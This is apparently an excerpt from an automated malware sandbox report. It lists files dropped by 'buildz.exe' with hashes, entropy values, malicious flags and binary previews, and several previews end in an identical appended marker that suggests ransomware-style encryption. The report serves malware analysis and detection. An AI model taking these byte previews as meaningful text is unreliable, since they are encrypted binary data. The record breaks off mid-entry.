                        Preview:[.. .>.i....<..........gK.Z....T..P<.<.a.-\...@.s..;.V.@..d...B-`{..p.=g2u.J...;...4Z.7.b....t3#0.[.p...h.....P.....V!a.e..H!.k.v|.44..N....M.R......fY..q...e...X..k..e)...m....|...N!.....F3..U..`?.A[c0....."fc.?.. 3ZD:z=Qs..c..UX\...j.....~.......f..A....}|b..=.....?..y.s..X.%...Mj.P....Q.kBA<..v..IWy.....|....."...}w*......o~..yF..E....2.A=-.o..`s.<.._.U..t,I.<|....3.\D......Pz.+.'.!...3hh.....9Me.......3.D..%.q.H>..T.._.a..?u..d.nd../...l....,$.......J...].0..[z....6r7................nC...dQ.}j=4.._.B..bl.y.w.(.Q1N...7...1|...Q...Sh8....3..<.F...OKx..)... ..:.Z....F.|.]..u.&...1ff.5..B8.Y...L..<e..u.IE...X5..l.ln/.....e.C.G-..h....5...3o.....g..J.6i......X....?.{......*N.U.z.c..:Ma..V.-... .r.(B....bM.0..S...'.w.:.;(Q ........|..5..!S.....-.;...>...=....Vms....2..(.|....&.W.=Rq..\..{...$.g....A....T@..20Sv.J.H..[,bc.J.v.Vj.7..P.!G......%..%...D=|....k_...........4.(.....>....'.G$..r.....#.r..-.4.|..{I.Q..:..].d.=..=1..h.J.C
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):9751
                        Entropy (8bit):7.980662278214918
                        Encrypted:false
                        SSDEEP:192:F0+V9iv+t6P5vIw/BYA5LBxq8E7l2Dms8z5h7jefWUgoQfb/WTV9/hfddR3Wi/aR:h30fBYA12cyjz5h7ifWUtQrWTVbfJ3+R
                        MD5:3EC4261F2C6566E2A1B9D28E485442DF
                        SHA1:794CBCCE62CE3AF1C504FD596F9050BC9780348F
                        SHA-256:547EFA43A8888F7BB7C21BA42A37C24ED49C5D8BE5728DD93D9DDC890D8DC55A
                        SHA-512:F7EEF4CB91AB8D3394AAE9F14D4E4FDE3F3D414DEB7B91A2F54D0AF14C7DBA106E63699EBB2B3A20C3D49E489B8F448D80E853CA51873949F38FC3C4300CD2C6
                        Malicious:false
                        Preview:(()=>.?.\L.Rx..',.q.:.<f.y...v...yA...Y.G1...'Q.f...~K.. .=%gh{#..Y.m~.x.|.H.;h0Rg..v..(.v!...n.G.J..zx.7...g..bs..+r..8xx.fG..j...::.A.V..YKF..I.]8q%...u.H. .....q.Nl.%![iA.h...<{L...e...{.aNl.....Kr..}......`..n.g.'.g..n?Y&.....%..f.~l....`...n...f.F..3.~..0~ol.......`)..%"t....h9.Q.EB~.T..D.Dn2(.C.0C......="?[..6.zL..u........;U(.=..[...........,.....4..;.U7.s%rapTqF.U.f.V)..`...?........i..b98../u.....=..=...v...*.%^Q..pc.J.....a'.....}rC.y.0O...5.V..&@.Jd.pd...X..x.M.H.b....T..=w*.!....c?M.C.. \..+.$.....4]......N....7.x.................../...*.;.....M="..U%K.....[.4..7..T....57....z[....w.R..l.J..5?.o..M.$3.#.^.ya#..F.F..qe..l...?...?.P...O.Oc.(..>........%'...\>._x..E.T..L......~d7C..(uZs..{._d.&_..............A.UQZ..s0..P........_.5....o...9......g3._E.nA.p.......7......g.@?...._x,.G..b'...i...L.....j~.}....m.G.[..M*iL....C.3...j...4NR,U.W...\.W .I....K.. 9.`(..$.U)<..B<.=.4Y.v.....Z.e7......u......g....~.p.K...T.5..:.p/U,.+...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10104
                        Entropy (8bit):7.981327334819524
                        Encrypted:false
                        SSDEEP:192:ZgY3i9jbkuMk2DdkSs/52Ao18wP5nGySqdjKk21R51A:SY3i9jdt2DdXXj1J5nGySqdjOj1A
                        MD5:5C2335C618C60F1A270D34BFD5B43FDA
                        SHA1:814ACFB4935EA24DE178D1BB3C61A27773C62DE9
                        SHA-256:412AFA1D457CB6144FEB71E4312CF625A19877D68F443AD5F0A36A8B55E469FA
                        SHA-512:060B8C0238D16F066266D1923DC67199DD537459171E55353C2EC08B284486DA9EA3D9441E4C35F47E148DCF525C1BDF8DE249BA36D001173ED46345D5C9DA2D
                        Malicious:false
                        Preview:(()=>...@...{+..]T..-.}...&.M..P..<kz...OxS.Z..._.*.V..T.......[.Sj(.Y....}....z5.>.0...Id. .......uO..j...|G..[A..:.ob.g..-..Fe...r].C..pv...p...+...e(.af1...s8..P......s.J.].o@...<Bd....Zm..d.@.........c..Oc.....f..........RT..9h......X..lt.E..^.0.{1#U...E.~a. q...".....[..)......{.i.S.2U..\.h..y.8.F..7....u.....M..C....hy......\.0yz.w..E..v}....=....Q..GPK{U.{..6.%.N+y1.}i'.b...Ea...2.A..1l...7#..".....-.....K....enV...S.....F.`=c.........t...rkm.R..fH.J.......>+.......E......1.~....w..Jq4...)..B...a.[.GB.b.....q..Y....DZN...}....:..15.*{...}.M.2......m.........P..L..B..r.wT...x.X.......v._f.....m.".../..Nw..qu..t...0..+.V..D....D.......^=.V.0.h..?..R..M.<..f.c...k...B..1....mi,; WR...o..d}.Wf.Fndb.O?n.q..:.........7.#.......y.w$.&..t.._/...\...0..5|m.."G.qC...@....i...,.Q..>':..........T`....e.5T6....)l....%Y...8d......eaO8.y..%}...........A.9.........Uqa.G.^..<...&..r.k8................=R...+O1.....W....zR=.;..i..C..VP.P=.v<......c
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1296
                        Entropy (8bit):7.850570360677779
                        Encrypted:false
                        SSDEEP:24:PDwGc+tOHzgW2v/pZnLRUx+OMwi1fq/43fQs1NuGGgJGbD:PDwNMOTk/LRo+bp1i/CNqGGgJUD
                        MD5:34EEBEBAA88A8BB3BEAA8033844560DD
                        SHA1:7A0AA8A368449AC879B73B4087F484945F5B0221
                        SHA-256:1A5DB025483DBC6D89C321173456BDC2619F12A568B1730AF4B7EC76E006020D
                        SHA-512:5A260BBF69E2D8675906CDF7211DD14479E2850B4551952901277FC7AE9F5A073505EA54B08EA1FE99F16FF9445F8A09C55B9F6CDE341932F38F84EB54D08F14
                        Malicious:false
                        Preview:{.. S...!...6.....7.G.`'.wi..QM.,..8j..!A.Xf..Y.5._...ib.......s...2..%....C...'/'..)...dq.m...I...Y.b.F...Dg.......0u....?..t....7..._.QD'S.._M!u..ZY..J......c...l.t~.o\~.'E..f'2...?.H.]....D.....?....K.jk.W...=i..}....h.&Has.]...\Q(I&.z.g:h3.dW8...sgMN...0.ty......<.1......&.:,...+m.|.>V...?b.~.B.4...e.$..Pp.XFh....o...c$.].k...Y..H.$.......F..Zh^tR..|M..y..%....T.d.0....iL.L.Y..u.=....`..........z%.XJ...fP..g..$.Cr..#z.Z....).......b.9....x...Qz...J.Q{..Jcsa.xB.....t..V.O|`ViL..\.c......l...K..(..R."..O'N....Q...w......S..uA....=.W0..>.n..;!.T.g.K>..|..,...V.O.T.~....\.m..WV.l...>m.?.M...h9.,T.<X1.#.vv.%.w......[..q..=..f.yD..G..+.r...-..?..........I.eJ&...r...{....k..J*..4..L..&{....:.......W.I...g..{......N..]S.....$7..=.<dQ...%..xj..@..+.-.6...5.V......=...f.D..>7...W.....1..YT..$+M[x.P.=4..ny.E(.E....v.a.M..9.`).[g....6.^.]............6*...._..]..P.4&.#.>........Au........}...=DW)6.tI> .........s(.N./5Z[N..z.T....z...).(.i
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):452
                        Entropy (8bit):7.505374228451166
                        Encrypted:false
                        SSDEEP:12:SMiP+ujngcaDc83mBkAKrDE5SM2d6utXrpUmBI26Gcii9a:jiP1ngcaDxWe3M5WHwmBaGbD
                        MD5:9F17AC167E2C8209475E6470AF7C4BE6
                        SHA1:9C674318ABA12299D1AC5D9AD0C05E0A12B4B193
                        SHA-256:19BB8A83D58607E7F39E407F3F275A6BA03EF38EF9009037C838771F4CA16171
                        SHA-512:33D346C95F58E25B773A8FA3B13B0C8910A25C2AF10C1A8FC0CE0FDC0031EC70AF08A08F274C0DECB4E35C9E6A0D93A111BB455B98D4AF300F4E1EE35891B170
                        Malicious:false
                        Preview:*...#[..g.@LK\.A.....G.....J..l..#|..u...--.F./.t.e....8...]....i..5.'o7.y.r...%.k..'.w...F..i3.....meW.y...`.@.t.q|...i..-...n.0.2..E...N,f...).o.H.;&.....b.[].4_W#..eb..N..<......^....%S...".Z(.A]..YwI....+...i..^=.......J,.K..q3..r.;Q..h.../...8.t..6..."...h.'.m.gV@./.(nq...i.KM.X...z?r....H....l.;..>{}..J.3D;.....*.B....L7...l!..t ..R.v.......h.._.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):374
                        Entropy (8bit):7.247814013642109
                        Encrypted:false
                        SSDEEP:6:61wwn2VS0/4o7lY+8rASjnwFjdVtUq13Dyy8kwq0i7KDg9a5meaMr8FGcii96Z:PFc0//7lV8rASjwklq0iIgImr26Gciik
                        MD5:84CD8E1A3522201E10593E89370624AA
                        SHA1:60E037D83FD54C6DC90C7D5B45B69D833D397C5D
                        SHA-256:CAE52B0AA2C625DAD2E29EC32EFAC2743F20E68C7447F4B000E2B98AB221FB21
                        SHA-512:EB603793AF70F002CECB67A232F85EE2C508F6EC086F30A7B353A3F85C2ABDE13D070D327D7E473B38C123B2C0EB75C975E668DB551A8A458A235F5FD7E3A0A6
                        Malicious:false
                        Preview:.On.!..%=.....iq.0........&>L.0....Sm*c.E.....t.ETW...l.....]..w#*Z$...`D.K.'..Do...i.0.P4...0.s.Q.o,S...G...O.c<....sBO."..J..<.1y(..&R6./5.7..x.I...{.#*.c.*&.Xd4.+X(Z.=....b..-R.>.mA'g..*..tI.F.Y..`....&...<...2o.W....=".b.d.|.Y....X..../.-...1.k..$.j..=e...X=....<~.a..#.."...{..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):683
                        Entropy (8bit):7.678233065571828
                        Encrypted:false
                        SSDEEP:12:kqcnsJqbEQfdagu0u6O2A8Ucfc/bURcHBjZoPvC6ppya29eLT/dZp040SYbje42b:tYbEQ1agujaA8ji3jZKa6ppYe3/dubji
                        MD5:D74AE127208C419C87B5CD99B09ED04A
                        SHA1:62187DF4AC577E3738706CD45B532E693AE939CE
                        SHA-256:17604295B953CF09F74FC231FF313DFE1841F7B4CB488CD78FBB3B99D2763113
                        SHA-512:C236C9703402D98798866ECB93AF73B2EC69A0356CB9328489E3DE8C96701F24368BE02794E6B5B46356166C2CB34E3BA0B519DE0F013EF7E274B4867BD4D9B3
                        Malicious:false
                        Preview:2023/..k.3..(-...Ty.D......./=...=.sJ...<S.Vs.....x.Amw.o...]n..Jj...y.p..Z.............G}.-.C7J]D...*..H"..j2...`.ZH$.0.'./...]a4<Y.{.`....W..]''........."gz..J.J.0......................fd..p,..~U.....3&Y"rb.D.....m.N....' .l.$4.zC..0.... X|.....A.........id.Y..k.?.Q..d..z.....`L..\>.....S.k...[.d.d..`%0.o$...Z......=.L...P3r.iJ.(..T.V..OB.Yqr. ....q6.F......$... .(.I.!.......+...*O...{...(........7_&......~Uj,Q.DTt.....2_...3p.........c.e.f.f.#.x...?."H..k..r7,2...n.u..~..K.p...8..r.oUWfx....EJj....a.c.,.P)6)[......oa..GF.........a6....1...h.'.k.B.$;t..S!...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):850
                        Entropy (8bit):7.6980876294622425
                        Encrypted:false
                        SSDEEP:12:Jgdo03xZ1CPrJheTnnrNo/J1L+17FHYN/GkQqJejbL589nWI3hDOzoSTk22Lu26A:yK7P7Qna6x4xGkJel8VWI3ZOkQGbD
                        MD5:E8AE26A84D692B64454B8A70568F418A
                        SHA1:9CFD178E88A2B7D969A67FA6AB17117D6B9EA283
                        SHA-256:C85BF604BEB8CA80A73F43C9250DA3C0A0B9B6CE03F456C9420D47D1882A1D05
                        SHA-512:AE0D06E8D2AF45F773D5575C8D128689E49FB10981C20ED7E8BDE389AB80CDAC389BE68E8A617540CDECC7A2A3324554A4CCE6B817AB15D1ABA25C7CBE21FB5B
                        Malicious:false
                        Preview:A..r...T.. ...R......f."..'H.7....r...k).....zh.=.AdC...8.J4.;.~^.....c...[.z.iQ.<.l..*<.......R..*`.v..GD... ...iZ,d..m.....|..X..U....7m& S.5.p.....,!...5.xW3....Qc......U.l!+...O..Z...I.HF.I.*M..o.._.......(.... .z)..`./.P...E. [.olr0.kB.X.]`..&.VD$......z...k.........X..u.UTuw....U..6..lP.bk....e.L........M.r.O.U...g...4..<T.p#`n.Xt..[...x..5...r..a*.I..{...|1.[T.V..Bq.....TE.Z.qRF.n*_1..9F$.......JE.,X...d.......Is....4..1h........R.h.F|f#.<._..`.~G.>.f+.V.y.._.......Rh\..`E..&....c.....9..j..n.....B...cS....H*..t6,.t.._^.US.4..$|.e&..C..1.?(S..).E..g.{.k....u<.....#.W~..?...F7....S....?...T.MQ.P*d..-.$..Ir(.k.g1.....+...r.Gzi..5QjFM...1...e7.A.9...;...+[b...&.L.0.}GBH....o............P.['..3H.+..^.....]&".y....k.-4...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):655
                        Entropy (8bit):7.5816211629689905
                        Encrypted:false
                        SSDEEP:12:kesfakFDHsIIzRIOIqOwh3bkAEG8QKlsJZ5MZrUVyZx4/26Gcii9a:PNkFazRTpvBD3XKl2+/rWGbD
                        MD5:B1E8A2C2D673B9B3B48B3ADEE7250DF8
                        SHA1:379AE4CCB1C92D99FCE45ED637DDC810E0069397
                        SHA-256:CB0322E6C935210409C0E4924C4E26613043F854A52D80B65D070DAEBCD58AB2
                        SHA-512:7C656994BBF4AA30E942AD7CA087B3718163C55B763F2257496EA1FB0D214322289587A64141A350769CC5E47832FA06F1D794301CCD9C74477F529C3FF572C9
                        Malicious:false
                        Preview:2023/.B...t.=., ...*i....0z.5....E|...&].qqx..404.s..@.*..|.e...5j.A..SI9.i.>...c5.su.Iv.....$.8Y,`...q?.......I.....:.D..d(.2*...2&J.0..y&Mcq.....E2j...Y..!3.7....>0m*..Y..}..s..SCf.d..`j..4..e......Zmwr.....4.,...0c...0....5..8....d..+.'.U..g;..p...`..FJ.'.px....2..21.CY..+..8&U.....Ij./-c._.0.7.Yb..o..O...C.........HQ.x 7n...O$b..v...a...C0.8.`..v.!..^. .mwK.G..|...66.....L...E9......0...>..N.!Wg".#.,.!.........iq\...^..'..2....6....d.%.*=.my.G.3.r.'..0.0.s.?.....P.F....G.w.ly.......j.zkCl..-p.....jn..O......3_...0...dpcj..M.9....l.j`.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):80530
                        Entropy (8bit):7.9977653963310145
                        Encrypted:true
                        SSDEEP:1536:0k/dM/EFzjnhkYvJsMxj0NWz+7d2ro7Wj5xEA5DXhC6ZjsbIgOvmTbvegBA:0k/dM/VYaEjKj0roSjzEIDXYVbIDSbFA
                        MD5:4521C7882B99001A77E4A636BD5A64E0
                        SHA1:0A28DAEBA83C0A8C423273796A4B5B1EAA8F3E85
                        SHA-256:7A7380F2AC762BFA5916052F55503B6B4A2F476CB778C9F3E4136DCA7D9EC0D2
                        SHA-512:E9C956438705629B0B3A4886CDF298E536F5EE661FF7DA886FE23484CD219D80AC935B238E68CCBA742FC00FAC741BA5335904B80FDF4DF7140E22FDC1C3B197
                        Malicious:true
                        Preview:ewogI.&.fN.)i&C.;.mQI........L....>;.....~,...*....iwnw..I}..7..A..xu.i..Hh...&.$/w......H20U[o..d.^..=1-...>.....O.0O7h.]r....._0...]y...'o.dY....Gy3.C..3....b`1...Z\{.m..*...L.Ge+..3.Xj..as.o7G....j.c..-E.fN.X<.R...b....Z...g8.U......x.......~.7..M......w;..U)YG..].+.?:-.V"Z5V.Z.MT..*....}.......$.Z..D.TyG.L"..W.V$ 4.7..V{-.m6.,V......&...U.e!..W.B.J..Z.X....vf.drK.Q/r.Y....;.0.].....w`h...tX..~%?..l.ly`>:..'..9q..(....u=. .s&)..:....j....S...G..RAl.n&.2..{/|R.}zl....S..-4...]..,y.H.........y..r.B...*z......m$...m..."Z.):...9/.....y...2....n.c<...*}\{....j..A....z....B.lCN..Ul......L..M......Fd$...Es..1..!m8}G.(T ....^..........<.....,.....^..o.f..GP....Q.&(+1U.=.@........4l....O.x.U.ez....=].....Jr..K......j..B.YfS.U..gn.l^.A..(.]....'..x.w.j..d$+..<.f..../.$..R.....cX)!%..i...._..7.r....!_Y.....L...B....m.h&..G...Tt... C24|...:~.t....#\..3K%.6.l.8L.m].u..[......7.......G4&..._m.R(3"T..L.r....\..q........m..QH.....>;.|q(G\.-..5x..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400
                        Entropy (8bit):7.416248245015954
                        Encrypted:false
                        SSDEEP:6:SQnCU5EsFbN7b7WYOzWPyLHGIDWHwaL4NCuLGZWaqHYGPy0Mr8FGcii96Z:x5EcvXhyLmIDWQa3YDHYO526Gcii9a
                        MD5:9678A255C881E43DC017DA76FCE9BFEA
                        SHA1:E6ABA99133D78E20C9A611FF3009FF13E951E63C
                        SHA-256:6F652404000A6F134657150CEACE28A641E39AD96D5BB6108D4C35ACE27706EE
                        SHA-512:EFD96C5BCD033C83ED5C7A9DF497F93517301FD8BBFC5B6222B20F739F1DD5E0BAC2AC9ABB5D0D8C64412A1FE3EAFA6A95E9A3143F3F23BD1441A8BD52A3E379
                        Malicious:false
                        Preview:1.558...."?~..l........@.....!"...Nty...].~...J.%-.C...O.:.."..I..A.......N|O..|C.....?h?0....Z-,*Lv.:...g...._.3....l....M...PR....>g;..A...f`...nlZ.........fa....T...^O....%..N5..w..v..|..e^..9..?.....X.rQ..j.......T..H<._~{.}..-2...f,.2.N:...c..n.I.v.HJ..e..U.p...,.{<.....;.{..n.80u..1.H.6.......i.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):387
                        Entropy (8bit):7.299104575790565
                        Encrypted:false
                        SSDEEP:12:YKpz34vUnntMLjM2kg3Y2Awo7okj26Gcii9a:YK9csMnygo2noskLGbD
                        MD5:842C32FB4DB6074F381FBD54DE50787A
                        SHA1:531701BB50295B190DE795B30A39B20741D7B2D0
                        SHA-256:2F110C8004A5105DFB9B509A27A9CF05714FF387C4F0B9B7FE3B3FB70AD0F23C
                        SHA-512:BAC5B3CCB0807086A6F6A92558AAD344BE2BFCEC49CC80AC026A50E49186392EFD5F963A79BBDEA021BEF437B3A0B75A38BFABB143F81432C12C0D0A0A616C1B
                        Malicious:false
                        Preview:{"nam$.;...fN]D..3BuM+.L.+..H.A.*].<t.....7.....&.d%.......<,\3..l...k#.......!.[.>..Bti..........fo..%..qe..L.....^..H ../X..Jmo...8....k.....,...y...vF.S>..i.@#..$$..&k..Ke.|.....g...(E......P...W!..I...K...By.&..DAt.E..lJ,].X0Q...5.4n.J.[..."o....Ur..^.c.A...;.N..^.*.5]..(!8.?..3.ljj..Na8K.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11901
                        Entropy (8bit):7.983111588741797
                        Encrypted:false
                        SSDEEP:192:s/nXR/KJb8eHOI4pqxM8GQIuyG4GbcNSoKWK4w+RwgJ9zntKbQXUMatJTpPIbPdI:s/nNKCehxMvtHj8oVKg3jtK3TAPJA
                        MD5:C5A1C2CCB6AB07AE320812060DB1C5C1
                        SHA1:A9FACB355633109485300B0D2422A91A61A067EE
                        SHA-256:DCC69F80C32B2DD18B560C1DEDDD9626061BF5FEE89BCF46C013E26BEBDCFADD
                        SHA-512:192D893BB7334B6685D4DF4FEEFA0B1E890B707582BA6B747E68529CEF1EB50709A4D54F95BA7EC2657AF3B320D3010DC1038425DCEE2E954828D9359228241D
                        Malicious:false
                        Preview:(()=>.+.q?.C1..&..x+Y.LPg.x....9..v...B)..;.V....2R.J....Z.....ro.>..Dv3..=..s..m.!.wmc.i..-......+.H.T_.J.7...K......^4.. q...`.&q.........M.....W.~Y.z.Y..+J=.^......M....(.I~K.`1..33..`...>.,.,....,*.z-.82xK.WX"&..x.......i.Lp........u...|..^....vB. .....`.~.)..D@...{...yF..X.1..(...eh.|@n.V]3..........d..J.....uk.c2.i..=..,...2.!.......7...ql...A..3...1.#P..~Z.A.M..3]..b.".).544..Y_S.......Z.)......f..>l..,......5..1...cU.f..%.k..U....../(..7.0.)...0...H.cJu..BZ.U.Ht...Q.s9....8..=...&:.w.........JR.........N.......e..?..% rO...2..'c#.x..X.'....+9,...b......|..0mS...DF..../oZ...7gZ...u......._.g..&%...u..Y..5.5..}'....e.-..E..C....l....V..&....a..zg.....).>.p...8...9...G..og.t....}J.|r.e...;mg..<.s...m.uF.......9.S!...~0.....|\...H..|.ir.`.|...6....~..].'5..k^7.....v.W^,?_*..............V-/^..#93.N..'.2....t.E....M.{.c.[@pi.S'.43..^KT........Sdg*.....&..m!Q..........{.2"..<L.....V..Qt4.F..i.^.O..^.....Wfr..o.{.....l...#c.8%..._...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400
                        Entropy (8bit):7.307845769018576
                        Encrypted:false
                        SSDEEP:6:SUYq9+FjJ5y40Q+d4OazExtPExAi16pgazxR3yWw8usaLfnlUN//Mt3nMr8FGciD:YqEhJI409lkMpg6ni1/n+/c26Gcii9a
                        MD5:8E2411E817F8987E9C7126FF221AE98A
                        SHA1:43C3BE17A646E10401054A6FBD286DB8E18DB61C
                        SHA-256:9E552AE0FC4404E5E41C617D586DEC6056E6113061797B3EEA8FF9091157B4E1
                        SHA-512:D4B9B4C8E8F7D0FBFD64A72E24A704D37BF554CF6D835C7B6E2EB13DD975E021B0F45AA0722DB2C66D35FE59DFD0134A199BF930AD2A365F0E59EDBF54DA7352
                        Malicious:false
                        Preview:1.1B2.<J.|....|#b...s.<.rC.."f.Y....m.:..`v. ...vIk.D...........j)...8*.t..U.G.>...X.10...C.H.Y..D.AB?...TIro*.........d.G...E$..'`M..P..Gz......U_....I..fL..I.-..M..:..X..U......(.R...A@....).ReBw.....A.g...J4....o..$}..+.f..Q...8.$M9E..k.6H%..c?...H].....rUica>"..<.....sD...l3.X.?x..90.{.(t..F#..l.D.g,...Q..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):450
                        Entropy (8bit):7.48204949144284
                        Encrypted:false
                        SSDEEP:12:MCOPuh8mGqRvDImkeZ8QdQn1wqW5uFfNq26Gcii9a:MtuFDlkMQ1wx5u3YGbD
                        MD5:E2B82B6AC0F2050654B55BFCB0FF094E
                        SHA1:2662A525C6129D702B5E892B0B6D092602DE9CBA
                        SHA-256:C9F0E52C86ED9D050280F14ECF7EC2B07DFFB6392F5602555D32C21AC24F7950
                        SHA-512:48CF5FF7BAD9FAE3BDD2DE5C2D837D3EBA69E9941EB2142441F8F1DFDB14893E856BF97364B7D710668A359271BD10270E2B325DFFC98A4A1D9DF167662D913A
                        Malicious:false
                        Preview:.{....H.b..k..`.:..U...b..uh..\..D.....v..u..3T.k.p.......2....}.8.......J$i..r....7h3.ZQ...O.v.K..Tk.M.?..zg..5[.mM.....m.~...p...%.0.9eG.\.U..,0.3i..Q1.......\.Oc..<0.im.0..z.b.....~..2.mSCd.Fi.Y.e..r....8..1...x.d...X..4.*g).s....J?.;.9.<)v...f.<kg.....A.PV]...J,..1.U/s.^H1<..$...TlU...KL6s..$.J.......Ah.H.w.=.p6.(........I.^.+3.Y!.O._E....L..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):953246
                        Entropy (8bit):6.394925733424443
                        Encrypted:false
                        SSDEEP:24576:YY0zhMxqSwf1p6KQcXZPLU/8d1rugFDcbmcVuVV2aiptWVslXdsXvD:4zbSY1p6KQcXZPLU/8d1rugFDcbmcVuV
                        MD5:2C583066917C13FEA10F2DA20A6B9832
                        SHA1:D16C75801736B25FE1FD5183D589C508A33AE376
                        SHA-256:47C2803558B07E6526282C13030295D72C4B46614B1278C60749303207F79909
                        SHA-512:EF445EB57FBD8B860581B82B734CF0A108783279D8977D1D30B0AB6070BE20470D35ACDA6F110B043EE9E4F0D11B19714E649791AB267AE635863CAC0259C102
                        Malicious:false
                        Preview:/*! F..=..a..Tb. 6=..Bh........%yWX..m..PK....r....~.......1.0^.........7...w..!.hBe?e...$Y)J.9...T...@"l.H..F*.1..I..w.....Ck.2}t...3.]*y...+,K..~..q.Z.W...PWx.....$.....2........F.J.B..oPX....>...6...=..Td..b...-...h..D2E.......Q].r.;.]...W..fHu.OK.p..((.e..BA.....#.C.H...].....K...G..rsi&.'..]f7F%.t......5zM......#..l.......*. .".i....YB%e..CTLe.cR!.VAf..x...........k..q.X.....8.g.LT..*.n3D.rp8u[......b..xBU.r.K.)L..DY.5{.?.;..\.+...iJ.zb.g.5..P..<.l.K.....7K.;..+.....N.S........1.....t.7El+W...%.. .^`....5E...4S1...Q.5.<y...%..0!Tjo.r.z.Xx%{P.^Z>.....;..H..O....:......Y*.../.WU..`......;..70....*+N.M..Q..&.4..W......N...o......_@.....m+>...k~=.X.'...=a7B(*...!R.8.&M...@...d. .s#.^..o..g..S.V...A...+.TfJ'9&..k..H..@....1f_..xL..}.U..*"..:....@G......#.i...|..I...9v.g..y..p..P(%....B.B..R.b..\........}~.Z..H..U..<...s*.3e...l..KE.&[.HUl.._...+..g./..2.W!.5Q!.|..X.W}.LO.......unR_.(8"F.).V&..s....[u&.._(.......p.x...<..r....EQ.......#..+...>y
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):793243
                        Entropy (8bit):6.545339842335263
                        Encrypted:false
                        SSDEEP:24576:Nv1s7qS3I9yHp/1l0I/Eqr3HNHK7ToEZyJxenyMUSM5VU+O91EMFgl:J1s7z3I9yHp/1l0I/Eqr3HNHmToEZyJf
                        MD5:5C71DBA1DC543DC15F8C8B80F55C6CF6
                        SHA1:69F2CCE3BE028B6E5F9606B8E7508B40A50D8E14
                        SHA-256:9EACDCA9AFC0EF059E26D259E88C8382CB598F85953A0B2D9C72AEF3614AC23E
                        SHA-512:B179422E9CEAE59C52C0B599C6EF1FAD8EA8CABAF1522319D54F212A5829E5948F7AD35A5004F641CE4092BE3EB22E09F9C64101802D22D39CCFA61524EA98B1
                        Malicious:false
                        Preview:(()=>.......Xt.....v.....K...K....WN..-..k."}G..'.*..f.T..)....J.R..<....R.a.W.. 1m..H.9.m..4.9ORC..+.U.=....v.V..-.;../....s.+...J.."&..$.o0.Kh.M.f....].b>Mx.....0.K..'..Ni.....?7.8}...Y.-.......q..\Qh}.*o.XP.>...E.......N.h....PD...v"....m.&.J?....x...8.C).......aBz.o.t.AEvE.....3Pz..%...j.<.!../,..d.4..JAB..V..c.o.......=4j{..>2p.F)..4...gS..'.Q^...\....-.....'..v.'...V.....UX.../..M.!..=(..(.C8......=.....m{.@.....ee.X.a.".[.,......)uk.W..>...^.M..c.d...e#.o;S..Y.3..x......)z.lI....R......N4Q._.....9.{...e.^....;.FM._......e6..q+......5^h..o....".a....=ou.'.Z.8. M...7..p.X.$......+.t$-.m.q.................`...;..t........K.H..$.._^.{.}..>.;...X..h(..}aSR.J.>.|R/...n.<j....3..{...r.0{;CX.wU^.../....A~.5...%.....W*..}........)....B3}O.Y.........U0.Re...cD.V~N.R.$..X:..<M.0y'.o..1..'.N.9..N.M.h.....Mr=..d.%.P.....j'.O.E.....;.b{..Sj.... .'....8..@.?B.-Aq...9.. .......6.EZ.....}...AR...S#.=.].......Sn_...i.P.h.Ur
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):818059
                        Entropy (8bit):6.514958114745722
                        Encrypted:false
                        SSDEEP:24576:HB5P59G6zeDug5LGhcQKyrqJY/huIXv0er0Usyi1JbCk1K2qGzXgQzz9pxrAQkyE:HB5P59nzeDug5LGhcQKyrqJY/huIXv0I
                        MD5:2170A6BB540805782F49E74CCF1C29A2
                        SHA1:21F3BA092124CF324FA9CAED25DFB32F732AED18
                        SHA-256:771FCAC994DE3697270FCD1EF74C8C8109EB0A8496238D6275AD9EAF58CF2205
